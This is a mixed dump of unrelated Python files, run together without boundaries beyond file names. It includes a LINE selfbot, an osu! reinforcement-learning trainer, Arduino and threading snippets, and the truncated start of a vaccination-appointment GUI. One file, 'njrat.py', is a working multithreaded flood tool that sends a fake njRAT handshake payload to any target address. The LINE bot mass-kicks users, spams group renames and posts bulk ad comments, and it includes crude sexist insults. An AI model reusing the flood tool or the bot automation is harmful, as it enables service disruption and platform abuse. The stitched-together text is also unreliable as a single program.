#-----------------------------------------------
#-------------ข้อความทักทาย Start---------------------#
elif msg.text in ["ทักทาย","หวัดดี","มอนิ่ง"]:
ki.sendText(msg.to,"หวัดดีเพื่อนๆรอบห้อง")
kk.sendText(msg.to,"หวัดดีแอด")
kc.sendText(msg.to,"หวัดดีรอง")
ks.sendText(msg.to,"ฝากเนื้อฝากตัวด้วยนะทุกคน..😉😉")
#-------------ข้ออความทักทาย Finish---------------------#
#-----------------------------------------------
#-------------Redbot Respon Start-----------------------#
elif msg.text in ["Absen","respon","เชคบอท","Respon"]:
#if msg.from_ in admin:
cl.sendText(msg.to,"เซลบอท On")
ki.sendText(msg.to,"คิก1 On")
kk.sendText(msg.to,"คิก2 On")
kc.sendText(msg.to,"คิก3 On")
ks.sendText(msg.to,"คิก4 On")
cl.sendText(msg.to,"Redsamuribot\nพร้อมรับคำสั่ง!!\nมีอะไรให้รับใช้เชิญสั่งการได้เลยคับนายหัว👍")
#-------------Redbot Respon Finish---------------------#
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "ความเร็วรอบเอว...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sต่อวินาที" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in owner:
wait["wblacklist"] = True
cl.sendText(msg.to,"Sent contact")
ki.sendText(msg.to,"Sent contact")
kk.sendText(msg.to,"Sent contact")
kc.sendText(msg.to,"Sent contact")
ks.sendText(msg.to,"Sent contact")
elif msg.text in ["Unban"]:
if msg.from_ in owner:
wait["dblacklist"] = True
cl.sendText(msg.to,"Sent contact")
ki.sendText(msg.to,"Sent contact")
kk.sendText(msg.to,"Sent contact")
kc.sendText(msg.to,"Sent contact")
ks.sendText(msg.to,"Sent contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'ued156c86ffa56024c0acba16f7889e6d'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"ผู้สร้างRedsamuribot 😜")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi","bot","Bot"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Kupret Lu','Muka Lu Kaya Jamban','Ada Orang kah disini?','Sange Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"ห้องนี้ไม่มีรายการที่ถูกแบน")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "ยินดีต้อนรับ สู่กลุ่ม " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "ผู้สร้างกลุ่ม👉 " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
random.choice(KAC).sendText(op.param1,"เข้ามาแล้วดูที่โน๊ตกลุ่มด้วยนะ !!! 😊\nอย่าลืมปิดเสียงแจ้งเตือนล่ะ 😘")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v ")
print "MEMBER HAS LEFT THE GROUP"
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉Auto Like by ⭐⭐Red⭐⭐👈\n\n™Redsamuri selfbot™")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"=====Ready=====\n[★]Bot Protect For Group\n[★]\n[★]Selfbot in Your Account[★]\n- 1 Selfbot 1 Bot Assist\n- 1 Selfbot 2 Bot Assist\n- 1 Selfbot 3 Bot Assist\n- 1 Selfbot 4 Bot Assist\n- 1 Selfbot 5 Bot Assist\nId Line Samuri5\n===[★]Redsamuri Bot Protect[★]===")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto like by Redsamuri Bot")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"=====Ready=====\n[★]Bot Protect For Group\n[★]\n[★]Selfbot in Your Account[★]\n- 1 Selfbot 1 Bot Assist\n- 1 Selfbot 2 Bot Assist\n- 1 Selfbot 3 Bot Assist\n- 1 Selfbot 4 Bot Assist\n- 1 Selfbot 5 Bot Assist\nId Line samuri5\n===[★]Redsamuri Bot Protect[★]===")
print "Like"
except:
pass
else:
print "Status Sudah di Like Plak"
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5a)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
import pickle
from random import random
import torch
import time
import pyautogui
import gc
import numpy as np
from threading import Thread
from tqdm import tqdm
import environment
from trainer import QTrainer, RainbowTrainer, TaikoTrainer
torch.set_printoptions(sci_mode=False)
pyautogui.MINIMUM_DURATION = 0.0
pyautogui.MINIMUM_SLEEP = 0.0
pyautogui.PAUSE = 0.0
BATCH_SIZE = 32
LEARNING_RATE = 0.00005 # Double DQN: 0.00025, Prioritized Replay -> Double DQN / 4
GAMMA = 0.999
MAX_STEPS = 25000
WIDTH = 878
HEIGHT = 600
STACK_SIZE = 4
DISCRETE_FACTOR = 10
X_DISCRETE = 685 // DISCRETE_FACTOR + 1
Y_DISCRETE = (560 - 54) // DISCRETE_FACTOR + 1
PIXEL_SKIP = 4
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def print_infos():
print('Discretized x: ' + str(X_DISCRETE))
print('Discretized y: ' + str(Y_DISCRETE))
print('Action dim: ' + str(X_DISCRETE * Y_DISCRETE * 4))
print('X_MAX = ' + str(145 + (X_DISCRETE - 1) * DISCRETE_FACTOR))
print('YMAX = ' + str(54 + 26 + (Y_DISCRETE - 1) * DISCRETE_FACTOR))
def log_episodes(i, q_trainer, steps, delta_t, k): # TODO : Make a logging utils and use log function
if i <= 1 or i % 30 == 0:
print(str(steps) + ' steps in ' + str(delta_t) + ' s.' + ' --> %.4f' % (steps / delta_t) + ' steps / s')
if i > 0 and i % 50 == 0:
q_trainer.avg_reward_plotter.fit()
q_trainer.avg_reward_plotter.show()
if i > 0 and i % 250 == 0:
q_trainer.plotter.fig.savefig('average_loss' + str(i) + '.png')
q_trainer.avg_reward_plotter.fig.savefig('episode_reward' + str(i) + '.png')
if i % 30 == 0:
print("Episode %d" % (i+1))
print("Time step %d" % k)
print("Schedule: %f" % q_trainer.scheduler.value(k))
def trainQNetwork(episode_nb, learning_rate, batch_size=BATCH_SIZE, load_weights=None, save_name='tests',
beatmap_name=None, star=1, evaluation=False, human_off_policy=False, load_memory=None, no_fail=False,
initial_p=1.0, end_p=0.05, decay_p=2000000, target_update=30000, init_k=0, min_experience=25000):
print_infos()
if evaluation:
learning_rate = 0.0
env = environment.OsuEnv(X_DISCRETE, Y_DISCRETE, DISCRETE_FACTOR, WIDTH, HEIGHT, STACK_SIZE, star=star,
beatmap_name=beatmap_name, no_fail=no_fail, skip_pixels=PIXEL_SKIP)
q_trainer = QTrainer(env, batch_size=batch_size, lr=learning_rate, gamma=GAMMA, initial_p=initial_p, end_p=end_p,
decay_p=decay_p, load_weights=load_weights, load_memory=load_memory,
min_experience=min_experience, gradient_clipping_norm=10.0)
episode_average_reward = 0.0
k = init_k
reward = torch.tensor(0.0, device=device)
for i in range(episode_nb):
controls_state, state = env.reset(reward)
env.launch_episode(reward)
episode_reward = 0.0
thread = None
start = time.time()
for steps in range(MAX_STEPS):
previous_t = time.time()
k += 1
with torch.no_grad():
if not human_off_policy:
if evaluation: # Choose greedy policy if tests
action = q_trainer.select_action(state, controls_state)
else: # Else choose an epsilon greedy policy with decaying epsilon
if k > min_experience:
sample = random()
if sample > q_trainer.scheduler.value(k):
action = q_trainer.select_action(state, controls_state)
else:
action = q_trainer.random_action(X_DISCRETE, Y_DISCRETE)
else:
action = q_trainer.random_action(X_DISCRETE, Y_DISCRETE)
new_state, new_controls_state, reward, done = env.step(action, steps)
else:
action, new_state, new_controls_state, reward, done = env.observe(steps)
if done:
new_state = None
else:
th = Thread(target=q_trainer.memory.push,
args=(state, action, reward, new_state, controls_state, new_controls_state))
th.start()
if thread is not None:
thread.join()
thread = Thread(target=q_trainer.optimize)
thread.start()
state = new_state
controls_state = new_controls_state
episode_reward += reward
#busy_wait(freq=12.0, previous_t=previous_t)
if done:
break
end = time.time()
delta_t = end - start
gc.collect()
episode_average_reward += episode_reward
q_trainer.avg_reward_plotter.step(episode_reward)
log_episodes(i, q_trainer, steps, delta_t, k)
if k % target_update == 0:
q_trainer.target_q_network.load_state_dict(q_trainer.q_network.state_dict())
if i % 30 == 0 and i > 0:
print('Mean reward over last 30 episodes: ')
print(episode_average_reward / 30)
episode_average_reward = 0.0
if beatmap_name is not None:
tmp = beatmap_name + save_name
else:
tmp = save_name
q_trainer.save_model(tmp, num=i)
if (episode_nb - 1) % 15 != 0:
if beatmap_name is not None:
tmp = beatmap_name + save_name
else:
tmp = save_name
q_trainer.save_model(tmp, num=episode_nb - 1)
q_trainer.plotter.fig.savefig('average_loss' + str(episode_nb-1) + '.png')
q_trainer.avg_reward_plotter.fig.savefig('average_reward' + str(episode_nb-1) + '.png')
print('k: %d' % k)
env.stop()
def RainbowManiaTrain(lr=0.0000625, batch_size=32, gamma=0.999, omega=0.5, beta=0.4, sigma=0.1, eps=1.5e-4, n=3, atoms=51,
max_timestep=int(5e7), learn_start=80000, stack_size=4, norm_clip=10.0, save_freq=50000,
model_save_path='weights/Rainbow_test', memory_save_path='weights/memory.zip', target_update_freq=80000,
star=4, beatmap_name=None, width=380, height=600, skip_pixels=4, num_actions=128, no_fail=False,
load_weights=None, load_memory=None, Vmin=-10, Vmax=10, resume_start=0, load_stats=None,
save_stats='./stats.pkl', learning_freq=1, load_optimizer=None, optimizer_path='weights/opti.pt',
evaluation=False, data_efficient=False):
priority_weight_increase = (1 - beta) / (max_timestep - learn_start - resume_start)
env = environment.ManiaEnv(height=height, width=width, stack_size=stack_size, star=star, beatmap_name=beatmap_name,
num_actions=num_actions, skip_pixels=skip_pixels, no_fail=no_fail)
trainer = RainbowTrainer(env, batch_size=batch_size, lr=lr, gamma=gamma, omega=omega, beta=beta, sigma=sigma, n=n,
eps=eps, atoms=atoms, norm_clip=norm_clip, load_weights=load_weights, load_memory=load_memory,
Vmin=Vmin, Vmax=Vmax, load_optimizer=load_optimizer, data_efficient=data_efficient)
if load_stats is None:
stat = {'episode_reward': []}
else:
with open(load_stats, 'rb') as f:
stat = pickle.load(f)
reward = 0.0
need_save = False
done = True
count = 0
thread = None
for t in tqdm(range(resume_start, max_timestep), desc="Timestep", unit='step', unit_scale=True):
if done:
if t > resume_start:
count += 1
trainer.avg_reward_plotter.step(episode_reward)
trainer.avg_reward_plotter.show()
trainer.plotter.show()
stat['episode_reward'].append(episode_reward.item())
if count % 100 == 0:
print(' - Mean reward over last 100 episodes: %.4f' % np.array(stat['episode_reward'][max(-100, -len(stat['episode_reward'])):]).mean())
if need_save:
trainer.save(model_save_path + str(t) + ".pt", memory_save_path, optimizer_path)
with open(save_stats, 'wb') as f:
pickle.dump(stat, f, protocol=4)
need_save = False
episode_reward = 0.0
gc.collect()
state = env.reset(reward)
env.launch_episode(reward)
trainer.reset_noise()
action = trainer.select_action(state)
next_state, reward, done = env.step(action)
reward = max(min(reward, 1.0), -1.0) # Reward clipping
episode_reward += reward
if env.episode_counter > 0: # Skip first episode because of latency issues
trainer.memory.append(state[-1], action, reward, done)
if t >= learn_start and t % learning_freq == 0 and not evaluation:
trainer.memory.priority_weight = min(trainer.memory.priority_weight + priority_weight_increase, 1)
if thread is not None:
thread.join()
thread = Thread(target=trainer.optimize)
thread.start()
if t % target_update_freq == 0 and t > 0:
trainer.update_target_net()
if t % save_freq == 0 and t > 0:
need_save = True
def TaikoTrain(lr=0.00008, batch_size=32, stack_size=1, skip_pixels=4, save_freq=20000, episode_nb=5,
target_update_freq=10000, star=None, beatmap_name=None, min_experience=10000, root_dir='./weights',
evaluation=False):
env = environment.TaikoEnv(stack_size=stack_size, star=star, beatmap_name=beatmap_name, skip_pixels=skip_pixels)
tt = TaikoTrainer(env, batch_size=batch_size, lr=lr, gamma=GAMMA, root_dir=root_dir, min_experience=min_experience, norm_clip=10.0)
need_update = False
need_save = False
for episode in range(episode_nb):
state = env.reset()
env.launch_episode()
episode_reward = 0.0
for steps in range(MAX_STEPS):
if evaluation:
action = tt.select_action(state)
else:
action = tt.select_explo_action(state)
new_state, reward, done = env.step(action)
episode_reward += reward
if not done:
th = Thread(target=tt.memory.push,
args=(state, action, reward, new_state))
th.start()
else:
break
state = new_state
# These boolean allow the program to wait for the end of the episode before performing the updates or the save to avoid latency while the agent is playing
if tt.steps_done % target_update_freq == 0:
need_update = True
if tt.steps_done % save_freq == 0:
need_save = True
for _ in range(steps):
tt.optimize()
if need_update:
tt.update_target()
need_update = False
if need_save:
tt.save()
need_save = False
print(steps)
tt.avg_reward_plotter.step(episode_reward)
tt.avg_reward_plotter.show()
tt.stop()
if __name__ == '__main__':
'''
weights_path = './weights/q_net__21-12-2020-14.pt'
memory_path = './memory.pck'
save_name = '_25-12-2020-'
trainQNetwork(50, LEARNING_RATE, evaluation=False, load_weights=None, beatmap_name="sink", star=7,
save_name=save_name, batch_size=BATCH_SIZE, human_off_policy=False, no_fail=True,
initial_p=1.0, end_p=0.05, decay_p=4000000, target_update=30000, init_k=0, min_experience=50)
'''
'''
RainbowManiaTrain(star=3, beatmap_name="bongo", num_actions=2**4, model_save_path="weights/Taiko_Bongo-31-05-2021_3stars",
learn_start=1600, load_weights=None, load_memory=None, batch_size=32, max_timestep=int(1e6),
memory_save_path='./weights/memory28-03-2021.zip', Vmin=-1, Vmax=10, resume_start=0, target_update_freq=5000,
load_stats=None, save_freq=5000, save_stats='./stats/stats-28-03-2021.pkl', learning_freq=1, lr=0.0001,
load_optimizer=None, optimizer_path='./weights/opti.pt', evaluation=False, n=20, data_efficient=True)
'''
TaikoTrain(root_dir='./weights/Taiko/2021-09-05_15/29/', evaluation=True, episode_nb=1500, min_experience=1500, save_freq=5000, target_update_freq=2000, batch_size=16, lr=0.0002)
|
njrat.py
|
#!/usr/bin/env python3
#MIT License
#
#Copyright (c) 2021 Sloobot
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import time
import socket
from threading import Thread
# Payload for NJRAT
payload = b"149\x00ll|'|'|SGFjS2VkXzc2MTNBMTJG|'|'|SERVERPC|'|'|ser|'|'|14-05-27|'|'||'|'|Win 8.1 ProSP0 x86|'|'|No|'|'|0.7d|'|'|..|'|'|UHJvZ3JhbSBNYW5hZ2VyAA==|'|'|"
print(payload)
def NJRAT_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting NJRAT attack...")
threads_list = []
def njrat_flood():
global FINISH
while True:
if FINISH:
break
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
except Exception as e:
print(e)
print("\033[1;31m"+"[-]"+"\033[0m"+" Failed to connect to NJRAT client!")
exit()
try:
sock.sendall(payload)
except Exception as e:
print(e)
time.sleep(0.25)
continue
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" NJRAT client is connected!")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = njrat_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" Attack completed.")
|
enviandoArduino.py
|
import serial
import threading
import time
conectado = False
desligarArduino = False
contador = 0
# posso criar inputs para esses parâmetros
portaCOM = 'COM5'
velocidadeBaud = 115200
# Se isso for válido, entra aqui
try:
# Comunicação com a serial
serialArduino = serial.Serial(portaCOM, velocidadeBaud, timeout=0.2)
print('Conectado!')
# Se não for válido, entra aqui
except:
print('Verifique a porta serial do seu Arduino ou reconecte seu Arduino!')
# É necessario criar uma função pro Thread
def leitura_porta(serialArduino, conectado=None, desligarArduino=None):
while not conectado:
#global conectado
conectado = True #False
while True:
reading = serialArduino.readLine().decode()
if reading != "": # Leitura diferente de vazio
enviar(reading)
if desligarArduino:
print('Desligando Arduino')
break
def enviar(reading):
global contador
print(f'Recebi {reading}')
contador += 1
lerSerialThread = threading.Thread(target=leitura_porta, args=(serialArduino,))
lerSerialThread.start()
print('Preparando o Arduino')
time.sleep(2)
print('Arduino pronto!')
#Programa principal
while (True):
try:
print('Enviando')
serialArduino.write('ligar lampada\n'.encode())
time.sleep(2)
print('Enviando')
serialArduino.write('desligar lampada\n'.encode())
time.sleep(2)
except KeyboardInterrupt:
# comando interrupção de teclado
print('Apertou ctrl + C')
desligarArduino = True
serialArduino.close()
lerSerialThread.join()
conectado = False
break
|
06-performace-threads-python.py
|
import datetime
import math
from multiprocessing import cpu_count
from threading import Thread
def computar(fim, inicio=1):
pos = inicio
fator = 1000 * 1000
while pos < fim:
pos += 1
math.sqrt((pos - fator) * (pos - fator))
def main():
quantidade_cores = cpu_count()
print(f'Realizando o processamento com {quantidade_cores} core(s)')
inicio = datetime.datetime.now()
ths = []
for n in range(1, quantidade_cores + 1):
ini = 50_000_000 * (n - 1) / quantidade_cores + 1
fim = 50_000_000 * (n) / quantidade_cores
print(f'core {n} processando de {ini} até {fim}')
ths.append(
Thread(target=computar, kwargs={"fim": fim, "inicio": ini}, daemon=True)
)
[th.start() for th in ths]
[th.join() for th in ths]
tempo = datetime.datetime.now() - inicio
print(f"terminou em {tempo.total_seconds():.2f} segundos")
if __name__ == '__main__':
main()
"""
Terminou em 16.07 segundos
"""
|
gui.py
|
#!/usr/bin/env python3
import json
import multiprocessing
import os
import threading
import time
import sys
from PyQt5 import QtCore, QtWidgets, uic
from PyQt5.QtGui import QIcon
from tools.exceptions import ValidationError, MissingValuesError
from tools import Modus
from tools import kontaktdaten as kontak_tools
from tools.gui import oeffne_file_dialog_select, open_browser
from tools.gui.qtkontakt import QtKontakt
from tools.gui.qtterminsuche import QtTerminsuche
from tools.gui.qtcodegen import QtCodeGen
from tools.utils import create_missing_dirs, update_available, get_latest_version, get_current_version
PATH = os.path.dirname(os.path.realpath(__file__))
class HauptGUI(QtWidgets.QMainWindow):
# Folgende Widgets stehen zur Verfügung:
### QLineEdit ###
# i_kontaktdaten_pfad
### Buttons ###
# b_termin_suchen
# b_code_generieren
# b_dateien_kontaktdaten
# b_neue_kontaktdaten
### Layouts ###
# prozesse_layout
### QSpinBox ###
# i_interval
def __init__(self, pfad_fenster_layout: str = os.path.join(PATH, "tools/gui/main.ui")):
"""
Main der GUI Anwendung
Args:
pfad_fenster_layout (str, optional): Ladet das angegebene Layout (wurde mit QT Designer erstellt https://www.qt.io/download).
Defaults to os.path.join(PATH, "tools/gui/main.ui").
"""
super().__init__()
create_missing_dirs(PATH)
#Spawn for now (The parent process starts a fresh python interpreter process. The child process will only inherit those resources necessary to run the process object’s)
multiprocessing.set_start_method('spawn')
# Laden der .ui Datei und Anpassungen
self.setup(pfad_fenster_layout)
# GUI anzeigen
self.show()
# Workaround, damit das Fenster hoffentlich im Vordergrund ist
self.activateWindow()
# Auf neuere Version prüfen
self.check_update()
##############################
# Allgemein Fenster #
##############################
@staticmethod
def start_gui():
"""
Startet die GUI Anwendung
"""
app = QtWidgets.QApplication(list())
app.setAttribute(QtCore.Qt.AA_X11InitThreads)
window = HauptGUI()
app.exec_()
def setup(self, pfad_fenster_layout: str):
"""
Standard Konfig für die GUI erstellen, bevor sie angezeigt werden kann
Args:
pfad_fenster_layout (str): Pfad zur .ui Datei
"""
### Allgemein ###
create_missing_dirs(PATH)
# Standard Pfade
self.pfad_kontaktdaten: str = os.path.join(PATH, "data", "kontaktdaten.json")
### GUI ###
uic.loadUi(pfad_fenster_layout, self)
self.setWindowIcon(QIcon(os.path.join(PATH, "images/spritze.ico")))
try:
self.setWindowTitle('vaccipy ' + get_current_version())
except Exception as error:
self.setWindowTitle('vaccipy')
pass
# Meldung falls alte Daten von alter Version
self.__check_old_kontakt_version()
# Funktionen den Buttons zuweisen
self.b_termin_suchen.clicked.connect(self.__termin_suchen)
self.b_code_generieren.clicked.connect(self.__code_generieren)
self.b_dateien_kontaktdaten.clicked.connect(self.__update_kontaktdaten_pfad)
self.b_neue_kontaktdaten.clicked.connect(lambda: self.kontaktdaten_erstellen(Modus.TERMIN_SUCHEN))
# Pfade in der GUI anpassen
self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
# Speichert alle termin_suchen Prozesse
self.such_prozesse = list(list())
self.prozesse_counter = 0
# Überwachnung der Prozesse
self.prozess_bewacher = threading.Thread(target=self.__check_status_der_prozesse, daemon=True)
self.prozess_bewacher.start()
def check_update(self):
"""
Prüft auf neuere Version und gibt evtl. ne Benachrichtigung an den User
"""
try:
# Auf Update prüfen
if update_available():
url = f"https://github.com/iamnotturner/vaccipy/releases/tag/{get_latest_version()}"
